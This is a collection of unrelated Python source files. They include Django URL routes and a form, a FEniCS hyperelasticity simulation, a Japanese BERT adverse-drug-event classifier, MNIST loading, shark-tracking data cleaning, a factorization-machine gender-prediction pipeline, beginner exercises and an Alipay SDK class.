path('random/<thing_type>/<attribute>', views.get_random_attribute, name='get_random_attribute'),
path('random/<thing_type>/<attribute>/<category>', views.get_random_attribute_in_category, name='get_random_attribute_in_category'),
path('manage/<thing_type>/<attribute>', views.manage_randomizer_options, name='manage_randomizer_options'),
path('manage/<thing_type>/<attribute>/<category>', views.manage_randomizer_options_for_category, name='manage_randomizer_options_for_category'),
path('add_random/<name>/<attribute>', views.generate_random_attributes_for_thing, name='add_random'),
path('ddb/<dndbeyond_type>/refs', views.manage_dndbeyond_refs, name='manage_dndbeyond_refs'),
path('add_one_random/<name>', views.add_random_attribute_for_thing, name='add_one_random'),
path('edit_random/<name>/<random_attribute_id>', views.edit_random_attribute_for_thing, name='edit_random'),
path('delete_random/<name>/<random_attribute_id>', views.delete_random_attribute_for_thing, name='delete_random'),
path('bookmark/<name>', views.bookmark, name='bookmark'),
path('generate/<name>', views.generate_object, name='generate'),
path('generate_in_location/<location_name>/<generator_name>', views.generate_object_in_location, name='generate_in_location'),
path('select_generator/<thing_type>', views.select_object_to_generate, name='select_generator'),
path('new_generator/<thing_type_name>', views.new_generator_object, name='new_generator'),
path('manage_generators/<thing_type_name>', views.select_generator_to_edit, name='manage_generators'),
path('edit_generator/<name>', views.edit_generator_object, name='edit_generator'),
path('add_preset', views.add_preset, name='add_preset'),
path('select_preset/<attribute_name>', views.select_preset, name='select_preset'),
path('manage_preset/<preset_name>/<attribute_name>', views.manage_weights, name='manage_preset'),
path('favicon.ico', RedirectView.as_view(url='/static/favicon.jpg', permanent=True))
]
|
from dolfin import *
import time
start = time.time()
# Optimization options for the form compiler
parameters["form_compiler"]["cpp_optimize"] = True
# parameters["form_compiler"]["representation"] = "quadrature" # change quadrature to uflacs if there's problem
# parameters["form_compiler"]["quadrature_degree"] = 2
ffc_options = {"optimize": True, \
"eliminate_zeros": True, \
"precompute_basis_const": True, \
"precompute_ip_const": True}
# Create mesh and define function space
# mesh = UnitCubeMesh(40, 20, 20)
p0 = Point(0.0, 0.0, 0.0)
p1 = Point(1.25, 1.0, 1.0)
mesh = BoxMesh(p0, p1, 50, 40, 40) # Number of elements
V = VectorFunctionSpace(mesh, "Lagrange", 1)
# Mark boundary subdomians
left = CompiledSubDomain("near(x[0], side) && on_boundary", side=0.0)
right = CompiledSubDomain("near(x[0], side) && on_boundary", side=1.25)
# Define Dirichlet boundary (x = 0 or x = 1)
c = Expression(("0.0", "0.0", "0.0"), degree=2)
r = Expression(("scale*0.0",
"scale*(y0 + (x[1] - y0)*cos(theta) - (x[2] - z0)*sin(theta) - x[1])",
"scale*(z0 + (x[1] - y0)*sin(theta) + (x[2] - z0)*cos(theta) - x[2])"),
scale = 0.5, y0 = 0.5, z0 = 0.5, theta = pi/3, degree=2)
bcl = DirichletBC(V, c, left)
bcr = DirichletBC(V, r, right)
bcs = [bcl, bcr]
# Define functions
du = TrialFunction(V) # Incremental displacement
v = TestFunction(V) # Test function
u = Function(V) # Displacement from previous iteration
B = Constant((0.0, -0.5, 0.0)) # Body force per unit volume
T = Constant((1.0, 0.0, 0.0)) # Traction force on the boundary
# Kinematics
d = u.geometric_dimension()
I = Identity(d) # Identity tensor
F = I + grad(u) # Deformation gradient
C = variable(F.T*F) # Right Cauchy-Green tensor
EE = 0.5 * (C - I)
# Invariants of deformation tensors
Ic = tr(C)
J = sqrt(det(C))
# J = det(F)
# Elasticity parameters
E, nu = 10**6, 0.3
mu, lmbda = Constant(E/(2*(1 + nu))), Constant(E*nu/((1 + nu)*(1 - 2*nu)))
# Stored strain energy density (compressible neo-Hookean model)
psi = (mu/2)*(Ic - 3) - mu*ln(J) + (lmbda/2)*(ln(J))**2
# Total potential energy
Pi = psi*dx - dot(B, u)*dx - dot(T, u)*ds
# Compute first variation of Pi (directional derivative about u in the direction of v)
F = derivative(Pi, u, v)
# Green-Lagrange strain tensor
S = 2*diff(psi, C) # Second Piola-Kirchhoff stress tensor
# P = dot(F, S)
# Compute Jacobian of F
J = derivative(F, u, du)
problem = NonlinearVariationalProblem(F, u, bcs, J)
solver = NonlinearVariationalSolver(problem)
prm = solver.parameters
# prm['newton_solver']['absolute_tolerance'] = 1E-8
# prm['newton_solver']['relative_tolerance'] = 1E-7
# prm['newton_solver']['maximum_iterations'] = 25
# prm['newton_solver']['relaxation_parameter'] = 1.0
prm['newton_solver']['linear_solver'] = 'gmres'
# prm['newton_solver']['linear_solver'] = 'minres'
solver.solve()
# Solve variational problem
# solve(F == 0, u, bcs, J=J, form_compiler_parameters=ffc_options)
# solve(F == 0, u, bcs, J=J, solver_parameters={"linear_solver":"lu"})
# Save solution in VTK format
vtkfile = File("./output/fem/Cuboid_U.pvd")
vtkfile << u
# Project and write stress field to post-processing file
# W = TensorFunctionSpace(mesh, "Discontinuous Lagrange", 0)
# GreenStrain = project(EE, V=W)
# File("Cuboid_E.pvd") << GreenStrain
# W = TensorFunctionSpace(mesh, "Discontinuous Lagrange", 0)
# secondPiola = project(S, V=W)
# File("Cuboid_S.pvd") << secondPiola
# Plot and hold solution
plot(u, mode="displacement", interactive=True)
L2 = inner(u, u) * dx
H10 = inner(grad(u), grad(u)) * dx
energynorm = sqrt(assemble(psi*dx))
# H1 = inner(F, P) * dx
L2norm = sqrt(assemble(L2))
H10norm = sqrt(assemble(H10))
print("L2 norm = %.10f" % L2norm)
print("H1 norm = %.10f" % sqrt(L2norm**2 + H10norm**2))
print("H10 norm (H1 seminorm) = %.10f" % H10norm)
print("H1 norm = %.10f" % energynorm)
print("L2 norm = %.10f" % norm(u, norm_type="L2"))
print("H1 norm = %.10f" % norm(u, norm_type="H1"))
print("H10 norm = %.10f" % norm(u, norm_type="H10"))
print("Running time = %.3f" % float(time.time()-start))
# u_P1 = project(u, V)
u_nodal_values = u.vector()
u_values = u.compute_vertex_values()
# array_u = u_nodal_values.array()
# Plot solution
plot(u, title='Displacement', mode='displacement')
F = I + grad(u)
P = mu * F + (lmbda * ln(det(F)) - mu) * inv(F).T
secondPiola = inv(F) * P
Sdev = secondPiola - (1./3)*tr(secondPiola)*I # deviatoric stress
von_Mises = sqrt(3./2*inner(Sdev, Sdev))
V = FunctionSpace(mesh, "Lagrange", 1)
W = TensorFunctionSpace(mesh, "Lagrange", 1)
von_Mises = project(von_Mises, V)
Stress = project(secondPiola, W, solver_type='gmres')
plot(von_Mises, title='Stress intensity')
# Compute magnitude of displacement
u_magnitude = sqrt(dot(u, u))
u_magnitude = project(u_magnitude, V)
plot(u_magnitude, 'Displacement magnitude')
# print('min/max u:',
# u_magnitude.vector().array().min(),
# u_magnitude.vector().array().max())
# Save solution to file in VTK format
File('./output/fem/elasticity/displacement.pvd') << u
File('./output/fem/elasticity/von_mises.pvd') << von_Mises
File('./output/fem/elasticity/magnitude.pvd') << u_magnitude
File('./output/fem/elasticity/Stress.pvd') << Stress |
# %%
#import os
#os.environ['CUDA_LAUNCH_BLOCKING'] = '1'
#同期用コード
import pandas as pd
import numpy as np
from pyasn1.type.base import SimpleAsn1Type
from transformers import BertJapaneseTokenizer
import re
# %%
from IPython import get_ipython
import random
import glob
from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
from transformers import BertJapaneseTokenizer, BertForSequenceClassification
import pytorch_lightning as pl
# %%
import codecs
from bs4 import BeautifulSoup
import unicodedata
frequent_tags= ['d', 'a', 'f', 'timex3', 't-test', 't-key', 't-val', 'm-key', 'm-val', 'r', 'cc']#抽出するタグ
'''属性考慮するタグ'''
frequent_tags_attrs= ['d_', 'd_positive', 'd_suspicious', 'd_negative', 'd_general', 'a_', 'f_', 'c_',\
'timex3_', 'timex3_date', 'timex3_time', 'timex3_duration', 'timex3_set', 'timex3_age', 'timex3_med', 'timex3_misc',\
't-test_', 't-test_executed', 't-test_negated', 't-test_other','t-key_', 't-val_',\
'm-key_executed', 'm-key_negated', 'm-key_other', 'm-val_', 'm-val_negated',\
'r_scheduled', 'r_executed', 'r_negated', 'r_other',\
'cc_scheduled', 'cc_executed', 'cc_negated', 'cc_other']#エンティティーのリスト
'''属性考慮しないタグ'''
frequent_tags_attrs = ['d_', 'a_', 'f_', 'timex3_', 't-test_', 't-key_', 't-val_', 'm-key_', 'm-val_', 'r_', 'cc_']
attributes_keys = ['type', 'certainty', 'state']
tags_value = [int(i) for i in range(1, len(frequent_tags_attrs)+1)]
dict_tags = dict(zip(frequent_tags_attrs, tags_value))#type_id への変換用
def entities_from_xml(file_name, attrs = True):#attrs=属性を考慮するか否か,考慮しないならFalse
with codecs.open(file_name, "r", "utf-8") as file:
soup = BeautifulSoup(file, "html.parser")
for elem_articles in soup.find_all("articles"):#articles内のarticleを一つずつ取り出す
entities = []
articles = []
for elem in elem_articles.find_all('article'):#article内の要素を一つずつ取り出す
entities_article = []
text_list = []
pos1 = 0
pos2 = 0
for child in elem:#取り出した要素に対して,一つずつ処理する
#(タグのないものについても要素として取得されるので,位置(pos)はずれない)
text = unicodedata.normalize('NFKC', child.string)#正規化
text = text.replace('。', '.')#句点を'.'に統一, sentenceの分割に使うため.
pos2 += len(text)#終了位置を記憶
if child.name in frequent_tags:#特定のタグについて,固有表現の表現形,位置,タグを取得
attr = ""#属性を入れるため
if 'type' in child.attrs:#typeがある場合には
attr = child.attrs['type']
if 'certainty' in child.attrs:#certaintyがある場合には
attr = child.attrs['certainty']
if 'state' in child.attrs:#stateがある場合には
attr = child.attrs['state']
if not attrs:#attrs=属性を考慮するか否か,考慮しないならFalse
attr = ""
entities_article.append({'name':text, 'span':[pos1, pos2],\
'type_id':dict_tags[str(child.name)+'_'+str(attr)],\
'type':str(child.name)+'_'+str(attr)})
pos1 = pos2#次のentityの開始位置を設定
text_list.append(text)
if elem.name == 'article':
article_id = elem.attrs['id']
articles.append([article_id, "".join(text_list)])
entities.append(entities_article)
return articles, entities
# %% ファイル名入力
articles, entities = entities_from_xml('MedTxt-CR-JA-training.xml', attrs=False)#属性考慮するならTrue
# %%
articles
# %%
df = pd.read_csv('/home/is/tomohiro-ni/NTICIR16/subtask3/MedTxt-CR-JA-ADE-training.csv')
# %%
df_articles = pd.DataFrame(articles, columns=['articleID', 'text'])
df_articles
# %%
#IDを判定して,同じIDの回数分だけドキュメントを複製する.
k = 0
docList = []
for i in range(len(df)):
ID1 = df_articles.iat[i, 0]#一方のID
document = df_articles.iat[i,1]
try:
while ID1 == df.iat[k, 0]:#IDが一緒な限り,繰り返す
docList.append(document)#ドキュメントの複製
k += 1
except IndexError:
break
# %%
# 関数にしてみる
# ふたつのデータフレームに共通するデータを判定し,
# 共通する回数分だけ繰り返して複製する
def concatenate_dup(df1, col1, df2, col2, col_result):
#df1はもとのデータフレーム
#df2は複製したいデータがあるデータフレーム
#col1とcol2はdf1,df2それぞれの一致している列番号
#例えば,IDなど
#col_resultはdf2の複製したいデータがある列番号
k = 0
duplicatedDataList = []
for i in range(len(df1)):
ID1 = df2.iat[i, col1]#一方のIDの列番号
originalData = df2.iat[i, col_result]
try:
while ID1 == df1.iat[k, col2]:#IDが一緒な限り,繰り返す
duplicatedDataList.append(originalData)#ドキュメントの複製
k += 1
except IndexError:
break
df3 = pd.DataFrame(duplicatedDataList, columns=['document'])
return pd.concat([df1, df3], axis=1)
# %%
df_concat = concatenate_dup(df, 0, df_articles, 0, 1)
# %%
for i in range(len(df_concat)):
text = df_concat['text'][i:i+1].to_string(index=False)
text = unicodedata.normalize('NFKC', text)
doc = df_concat['document'][i:i+1].to_string(index=False)
match = re.search(re.escape(text),re.escape(doc))#escapeすると,matchが取れるのあるっぽい
try:
span1 = max(0, match.start())#matchが取れないの諦める
except:
print(doc)
print(text)
# %%
df.groupby('ADEval').size()
# %%
# 日本語学習済みモデル
MODEL_NAME = 'cl-tohoku/bert-base-japanese-whole-word-masking'
tokenizer = BertJapaneseTokenizer.from_pretrained(MODEL_NAME)
# %%
def extract_text_from_document(text, document):
match = re.search(re.escape(text), document)#escapeすることで,取得できないtextがなくなる
length = len(document)
span1 = max(0, match.start()-50)#前後50文字を取得
span2 = min(length, match.end()+50)
return document[span1:span2]
# %%
inputTextList = []#文章+text+tagの順で入力する
inputLabelList = []
inputEntityTxList = []#のちの評価の時ために作っておく
inputtagList = [] #のちの評価の時ために作っておく
k = 0
for i in range(len(df)):
ID1 = df_articles.iat[i, 0]
document = df_articles.iat[i,1]
try:
while ID1 == df.iat[k, 0]:
text = unicodedata.normalize('NFKC', df.iat[k,2])#dfのtext取得(entity)
tag = df.iat[k,1]#tag取得
label = df.iat[k,4]
try:
inputTextList.append\
(extract_text_from_document(text, document))
inputLabelList.append(label)
inputEntityTxList.append(text)
inputtagList.append(tag)
except AttributeError:#matchで取得できないものは飛ばす
print(document)
print(text)
k += 1
except IndexError:
break
# %%
# ラベル数の確認
pd.DataFrame(inputLabelList, columns=['label']).groupby('label').size()
# %%
# 6-4
tokenizer = BertJapaneseTokenizer.from_pretrained(MODEL_NAME)
bert_sc = BertForSequenceClassification.from_pretrained(
MODEL_NAME, num_labels=4
)
bert_sc = bert_sc.cuda()
# %%
#データリストを作る
datasetList = list(map(list, (zip(*[inputTextList, inputLabelList, inputEntityTxList, inputtagList]))))
# %%
random.seed(42)
random.shuffle(datasetList) # ランダムにシャッフル
n = len(datasetList)
n_train = int(0.8*n)
n_val = int(0.1*n)
dataset_trainList = datasetList[:n_train] # 学習データ
dataset_valList = datasetList[n_train:n_train+n_val] # 検証データ
dataset_testList = datasetList[n_train+n_val:] # テストデータ
# %%
# 各データの形式を整える
def dataset_for_loader(datasetList):
max_length = 128
dataset_for_loader = []
for text1, label, text2, tag in datasetList:
#encode_plusで挟んだものの"[SEP]"で 入れられるっぽい
encoding = tokenizer.encode_plus(
text1,
text2 + "[SEP]" + tag,
max_length=max_length,
padding='max_length',
truncation=True,
)
encoding['labels'] = label # ラベルを追加
encoding = { k: torch.tensor(v) for k, v in encoding.items() }
dataset_for_loader.append(encoding)
return dataset_for_loader
# %%
dataset_train = dataset_for_loader(dataset_trainList)
dataset_val = dataset_for_loader(dataset_valList)
dataset_test = dataset_for_loader(dataset_testList)
# %% シードの固定
seed = 42
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
def seed_worker(worker_id):
worker_seed = torch.initial_seed() % 2**32
np.random.seed(worker_seed)
random.seed(worker_seed)
g = torch.Generator()
g.manual_seed(seed)
# %%
# データセットからデータローダを作成
# 学習データはshuffle=Trueにする。
dataloader_train = DataLoader(
dataset_train, batch_size=32, worker_init_fn=seed_worker, generator=g
)
dataloader_val = DataLoader(dataset_val, batch_size=256, worker_init_fn=seed_worker, generator=g)
dataloader_test = DataLoader(dataset_test, batch_size=256, worker_init_fn=seed_worker, generator=g)
# %%
# 6-14
class BertForSequenceClassification_pl(pl.LightningModule):
def __init__(self, model_name, num_labels, lr):
# model_name: Transformersのモデルの名前
# num_labels: ラベルの数
# lr: 学習率
super().__init__()
# 引数のnum_labelsとlrを保存。
# 例えば、self.hparams.lrでlrにアクセスできる。
# チェックポイント作成時にも自動で保存される。
self.save_hyperparameters()
# BERTのロード
self.bert_sc = BertForSequenceClassification.from_pretrained(
model_name,
num_labels=num_labels
)
# 学習データのミニバッチ(`batch`)が与えられた時に損失を出力する関数を書く。
# batch_idxはミニバッチの番号であるが今回は使わない。
def training_step(self, batch, batch_idx):
output = self.bert_sc(**batch)
loss = output.loss
self.log('train_loss', loss) # 損失を'train_loss'の名前でログをとる。
return loss
# 検証データのミニバッチが与えられた時に、
# 検証データを評価する指標を計算する関数を書く。
def validation_step(self, batch, batch_idx):
output = self.bert_sc(**batch)
val_loss = output.loss
self.log('val_loss', val_loss) # 損失を'val_loss'の名前でログをとる。
# テストデータのミニバッチが与えられた時に、
# テストデータを評価する指標を計算する関数を書く。
def test_step(self, batch, batch_idx):
labels = batch.pop('labels') # バッチからラベルを取得
output = self.bert_sc(**batch)
labels_predicted = output.logits.argmax(-1)
num_correct = ( labels_predicted == labels ).sum().item()
accuracy = num_correct/labels.size(0) #精度
self.log('accuracy', accuracy) # 精度を'accuracy'の名前でログをとる。
# 学習に用いるオプティマイザを返す関数を書く。
def configure_optimizers(self):
return torch.optim.Adam(self.parameters(), lr=self.hparams.lr)
# %%
# 6-15
# 学習時にモデルの重みを保存する条件を指定
checkpoint = pl.callbacks.ModelCheckpoint(
monitor='val_loss',
mode='min',
save_top_k=1,
save_weights_only=True,
dirpath='model/',
)
# 学習の方法を指定
trainer = pl.Trainer(
gpus=1,
max_epochs=10,
callbacks = [checkpoint]
)
# %%
# 6-16
# PyTorch Lightningモデルのロード
model = BertForSequenceClassification_pl(
MODEL_NAME, num_labels=4, lr=1e-5
)
# %%
# ファインチューニングを行う。
trainer.fit(model, dataloader_train, dataloader_val)
# %%
# 6-17
best_model_path = checkpoint.best_model_path # ベストモデルのファイル
print('ベストモデルのファイル: ', checkpoint.best_model_path)
print('ベストモデルの検証データに対する損失: ', checkpoint.best_model_score)
# %%
# 6-18
get_ipython().run_line_magic('load_ext', 'tensorboard')
get_ipython().run_line_magic('tensorboard', '--logdir ./')
# %%
# 6-19
test = trainer.test(test_dataloaders=dataloader_test)
print(f'Accuracy: {test[0]["accuracy"]:.2f}')
# %%
model = BertForSequenceClassification_pl.load_from_checkpoint(best_model_path)
model = model.cuda()
# %%
model.bert_sc.save_pretrained('./model_transformers')
# %%
bert_sc = BertForSequenceClassification.from_pretrained(
'./model_transformers'
)
bert_sc = bert_sc.cuda()
# %%
text_list = []
label_list = []
for text, label, EntityTx, tag in dataset_testList:
text_list.append(text)
label_list.append(label)
# %%
pd.DataFrame(label_list, columns=['label']).groupby('label').size()
# %%
dataset_testList
# %%
#分類スコアを求めるために変換する関数
def encoding_plus_for_logits(dataset_List, num1, num2):
#dataset_List=[text1, text2, label], num=入れすぎるとメモリ不足, num1,num2で範囲指定する.
dataset_encoding_list = []
max_length = 128
for text1, label, text2, tag in dataset_List:
encoding = tokenizer.encode_plus(
text1,
text2 + "[SEP]" + tag,
max_length=max_length,
padding='max_length',
truncation=True,
)
encoding['labels'] = label # ラベルを追加
encoding = { k: torch.tensor(v) for k, v in encoding.items() }
dataset_encoding_list.append(encoding)
#このままだとoutput = bert_sc(**dataset_encoding)に入らないので,
#以下で整形する
encoding_input_ids = []
encoding_token_type = []
encoding_attention_mask = []
encoding_labels = []
#dictから抜き出す
for i in range(num1, num2):
encoding_input_ids.append(dataset_encoding_list[i]['input_ids'])
encoding_token_type.append((dataset_encoding_list[i]['token_type_ids']))
encoding_attention_mask.append((dataset_encoding_list[i]['attention_mask']))
encoding_labels.append((dataset_encoding_list[i]['labels']))
#tensorをまとめる
dataset_encoding = {'input_ids': torch.stack(encoding_input_ids).cuda(),
'token_type_ids':torch.stack(encoding_token_type).cuda(),
'attention_mask':torch.stack(encoding_attention_mask).cuda(),
'labels':torch.stack(encoding_labels).cuda()
}
#分類ラベルを得る
with torch.no_grad():
output = bert_sc(**dataset_encoding)
scores = output.logits
labels_predicted = scores.argmax(-1)
return labels_predicted
# %%
labels_predicted = encoding_plus_for_logits(dataset_testList, 0, len(dataset_testList))
# %%
labels_predicted = labels_predicted.tolist()
# %%
# %%
df_test = pd.DataFrame(dataset_testList, columns=['text', 'label', 'Entitytext', 'tag'])
# %%
# %%
#predictedを追加
df_test['predicted']=labels_predicted
# %%
def DataFrame_classification(label, predicted):
from sklearn.metrics import classification_report
df_eval = pd.DataFrame(classification_report(\
label, predicted, digits=3, zero_division=0, output_dict=True)).round(3).T
df_eval['support']=df_eval['support'].astype(int)
return df_eval
# %%
DataFrame_classification(df_test["label"], df_test["predicted"])
|
"""
checking if I can import mnist
"""
import matplotlib.pyplot as plt
import numpy as np
import os
def load_mnist(data_dir):
X_train_raw = np.fromfile(os.path.join(data_dir, 'mnist-train-images.dat'), dtype=np.uint8, offset=16)
X_train = X_train_raw.reshape(-1, 28*28)
X_test_raw = np.fromfile(os.path.join(data_dir, 'mnist-test-images.dat'), dtype=np.uint8, offset=16)
X_test = X_test_raw.reshape(-1, 28*28)
y_train = np.fromfile(os.path.join(data_dir, 'mnist-train-labels.dat'), dtype=np.uint8, offset=8)
y_test = np.fromfile(os.path.join(data_dir, 'mnist-test-labels.dat'), dtype=np.uint8, offset=8)
return X_train, y_train, X_test, y_test
X_train, y_train, X_test, y_test = load_mnist('mnist')
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import io
import pandas as pd
from datetime import datetime
# In[2]:
# Upload the CSV Here
# from google.colab import files
# uploaded = files.upload()
# # Replace the filename here if you have saved the CSV as a different
# df = pd.read_csv(io.BytesIO(uploaded[
# 'Beneath The Waves - Blue Shark Atlantic - Data Jan 21, 2019.csv']))
df = pd.read_csv(
'https://drive.google.com/uc?id=1XtdF630BEDDv-ixbZ6cE4RJlbVwukiUU&export=download'
)
# In[ ]:
# Now that we have uploaded the Data we can see it as a Dataframe
df.head()
# Next step is to clean the Data and drop the columns we don't need
COLUMN_MAPPING = {
'Prg No.': 'prg_no',
'Latitude': 'lat',
'Longitude': 'long',
'Loc. quality': 'loc_quality',
'Loc. date': 'loc_date',
'Loc. type': 'loc_type',
'Altitude': 'alt',
'Pass': 'pass',
'Sat.': 'satellite',
'Frequency': 'freq',
'Msg Date': 'msg_date',
'Comp.': 'comp',
'Msg': 'msg',
'> - 120 DB': 'db_120_gt',
'Best level': 'best_level',
'Delta freq.': 'delta_freq',
'Long. 1': 'long_1',
'Lat. sol. 1': 'late_sol_1',
'Long. 2': 'long_2',
'Lat. sol. 2': 'lat_sol_2',
'Loc. idx': 'loc_idx',
'Nopc': 'nopc',
'Error radius': 'err_radius',
'Semi-major axis': 'semi_major_axis',
'Semi-minor axis': 'semi_minor_axis',
'Ellipse orientation': 'ellipse_orientation',
'GDOP': 'gdop'
}
# Drop Columns with no location data
cleaned_df = df.dropna(subset=['Latitude', 'Longitude'])
# Drop Columns with bad location data quality
cleaned_df = cleaned_df.loc[cleaned_df['Loc. quality'].apply(str.isdigit)]
# Select the important columns
cleaned_df = cleaned_df[list(COLUMN_MAPPING.keys())]
# Rename the columns to be more pythonic
cleaned_df = cleaned_df.rename(columns=COLUMN_MAPPING)
# Cast to datetime values to datetime
cleaned_df['loc_date'] = cleaned_df.loc_date.apply(lambda x: datetime.strptime(x, '%m/%d/%y %H:%M'))
cleaned_df.head()
# In[ ]:
|
import load_data
import blocks
import features
import numpy as np
import scipy.sparse as sp
from sklearn.preprocessing import normalize
from sklearn.metrics import accuracy_score
from sklearn.cross_validation import train_test_split
from sklearn import cross_validation
import copy
from sklearn.externals.joblib import Memory
memory = Memory('data/cache/')
def evaluate(doc):
train_data = load_data.data_df(doc['dataset']['path'])
n_session = train_data.session_id.nunique()
session_ids = train_data.session_id.unique()
train_data['row_nr'] = train_data.index
train_data = train_data.set_index('session_id')
design_doc = dict((d, copy.deepcopy(doc[d]))
for d in ['dataset', 'shift_features', 'max_shift',
'min_freq', 'features'])
train_doc = {'fm_param': doc['fm_param'],
'seeds': doc['seeds']}
y = train_data.gender.values.copy()
y[y == 0] = -1
X = create_design_matrix(design_doc)
i_sessions = np.arange(n_session)
X_train_org, X_test, i_train, i_test = train_test_split(
i_sessions, i_sessions, test_size=0.33, random_state=23)
i_train = train_data.loc[session_ids[i_train]].row_nr.values
i_test = train_data.loc[session_ids[i_test]].row_nr.values
y_train_org = y[i_train]
y_test = y[i_test]
X_train_org = X[i_train, :]
X_test = X[i_test, :]
t_best = 0.0
acc_best = 0.0
y_pred_proba = fit_predict(X_train_org, y_train_org, X_test, train_doc)
df_block = blocks.get_blocks(doc)
df_block = df_block.set_index('session_id').\
loc[session_ids[i_test]].reset_index('session_id')
df_block['proba'] = y_pred_proba
df_post = blocks.postprocess(df_block, doc['min_size'],
doc['lower_proba'], doc['upper_proba'])
y_pred_proba = df_post.proba.values
t_best, acc_best = find_treashold(y_test, y_pred_proba)
doc['output']['threshold'] = t_best
doc['output']['acc'] = acc_best
return doc
def find_treashold(y_test, y_pred_proba,
levels=[.5, .65, .7, .75, .7802, .8, .82, .83, .84, .85,
.86, .87, .88, .9], verbose=True):
acc_best = 0
t_best = 0
for t in levels:
acc = balanced_acc(y_test, y_pred_proba, t)
if verbose:
print t, acc
if acc > acc_best:
t_best = t
acc_best = acc
return t_best, acc_best
def submission(doc):
train_data = load_data.data_df(doc['dataset']['path'])
y_train = train_data.gender.values.copy()
y_train[y_train == 0] = -1
X_train = create_design_matrix(doc, is_test=False)
X_test = create_design_matrix(doc, is_test=True)
y_pred_proba = fit_predict(X_train, y_train, X_test, doc)
df_block = blocks.get_blocks(doc, is_test=True)
df_block['proba'] = y_pred_proba
df_post = blocks.postprocess(df_block, doc['min_size'],
doc['lower_proba'], doc['upper_proba'])
y_pred_proba = df_post.proba.values
y_output = np.array(['female'] * len(y_pred_proba))
y_output[y_pred_proba <= doc['threshold']] = 'male'
np.savetxt(doc['submission_path'], y_output, fmt="%s", newline='\n')
np.savetxt(doc['submission_path'] + 'probs',
y_pred_proba, fmt="%s", newline='\n')
def create_design_matrix(doc, is_test=False):
path = doc['dataset']['path']
X_cat = features.cat_matrices(path, is_test=is_test)
if 'min_freq' in doc:
for min_freq in doc['min_freq']:
X_cat_min_feq = features.cat_matrices(path, is_test=is_test,
min_freq=min_freq)
X_cat.update(X_cat_min_feq)
X_shift = features.neighbors(X_cat, doc, is_test)
X_cat.update(X_shift)
X_features = [normalize(X_cat[cat], norm='l2').tocsc() if
sp.isspmatrix(X_cat[cat])
else X_cat[cat] for cat in doc['features'] if
cat in X_cat]
X = sp.hstack(X_features).tocsc()
return X
#@memory.cache
def fit_predict(X_train, y_train, X_test, doc):
return fit_predict_fm(X_train, y_train, X_test, doc)
def fit_predict_fm(X_train, y_train, X_test, doc):
print 'fm'
n_seeds = len(doc['seeds'])
y_pred_proba = np.empty((X_test.shape[0], n_seeds), dtype=np.float64)
# fit fm with mutliple seeds, to reduce dependency on individual seeds
for n, s in enumerate(doc['seeds']):
from fastFM import mcmc
param = doc['fm_param']
fm = mcmc.FMClassification(random_state=s, rank=param['rank'],
init_stdev=param['stdev'],
n_iter=param['n_iter'])
y_pred_proba[:, n] = fm.fit_predict_proba(X_train, y_train, X_test)
return y_pred_proba.mean(axis=1)
def balanced_acc(y_test, y_pred_proba, threshold=0.5):
y_pred = np.ones_like(y_pred_proba)
y_pred[y_pred_proba < threshold] = -1
test_n_male = (y_test == -1).sum()
test_n_female = len(y_test) - test_n_male
female_ratio = float(test_n_male) / test_n_female
sample_weight = np.ones_like(y_test)
sample_weight[y_test == 1] *= female_ratio
return accuracy_score(y_test, y_pred, sample_weight=sample_weight)
def transform(X_train, y_train, X_test, doc):
print 'transform'
if X_test is not None:
y_test_pred = fit_predict_fm(X_train, y_train, X_test, doc)
X_test_proba =\
features.padded_rolling_window(y_test_pred,
doc['transform']['window'])
else:
X_test_proba = None
# cross_validation is need to get predictions for all training samples
y_train_pred = np.empty_like(y_train, dtype=np.float64)
y_train_pred.fill(np.nan)
kf = cross_validation.StratifiedKFold(y_train,
n_folds=doc['transform']['n_folds'],
shuffle=True, random_state=123)
for i_train, i_test in kf:
print i_train.shape, i_test.shape
tmp_pred = fit_predict_fm(X_train[i_train, :],
y_train[i_train], X_train[i_test, :], doc)
y_train_pred[i_test] = tmp_pred
X_train_proba = features.padded_rolling_window(y_train_pred,
doc['transform']['window'])
return X_train_proba, X_test_proba
|
class Backtrack:
def backtrack(self, a, k, userData):
if (self.isSolution(a, k, userData)):
self.processSolution(a, k, userData)
else:
k += 1
candidates = self.constructCandidates(a, k, userData)
for candidate in candidates:
a[k] = candidate;
self.makeMove(a, k, userData)
self.backtrack(a, k, userData)
self.unmakeMove(a, k, userData)
def makeMove(self, a, k, userData):
return
def unmakeMove(self, a, k, userData):
return
|
from django import forms
class NewUserForm(forms.Form):
name = forms.CharField(label='name', max_length=100)
email = forms.EmailField(label='email')
|
#task 1
nyaam = float (input('enter a length in cm: '))
if nyaam < 0:
print ('entry is invalid')
else:
res = nyaam / 2.54
print (res, 'inch')
#task 2
whoosh = int (input ('how many credits have you taken? '))
if whoosh > 0 and whoosh < 24:
print ('congrats, you a freshman!')
elif whoosh > 23 and whoosh < 54:
print ('congrats, you a sophomore!')
elif whoosh > 53 and whoosh < 84:
print ('congrats, you a junior!')
elif whoosh > 83:
print ('congrats, you a senior!')
elif whoosh <= 0:
print ('you haven\'t any credits, fool')
#task3
from random import randrange
jeffry = randrange(10)
goat = float (input ('guess the number between 0 n 10: '))
if goat == jeffry:
print ('you\'re right!')
else:
print ('that\'s not it, pal')
print (jeffry)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class LogicalRuleItemDTO(object):
def __init__(self):
self._crowd_name = None
self._ext_crowd_key = None
self._gmt_expired_time = None
self._schedule_type = None
self._type = None
@property
def crowd_name(self):
return self._crowd_name
@crowd_name.setter
def crowd_name(self, value):
self._crowd_name = value
@property
def ext_crowd_key(self):
return self._ext_crowd_key
@ext_crowd_key.setter
def ext_crowd_key(self, value):
self._ext_crowd_key = value
@property
def gmt_expired_time(self):
return self._gmt_expired_time
@gmt_expired_time.setter
def gmt_expired_time(self, value):
self._gmt_expired_time = value
@property
def schedule_type(self):
return self._schedule_type
@schedule_type.setter
def schedule_type(self, value):
self._schedule_type = value
@property
def type(self):
return self._type
@type.setter
def type(self, value):
self._type = value
def to_alipay_dict(self):
params = dict()
if self.crowd_name:
if hasattr(self.crowd_name, 'to_alipay_dict'):
params['crowd_name'] = self.crowd_name.to_alipay_dict()
else:
params['crowd_name'] = self.crowd_name
if self.ext_crowd_key:
if hasattr(self.ext_crowd_key, 'to_alipay_dict'):
params['ext_crowd_key'] = self.ext_crowd_key.to_alipay_dict()
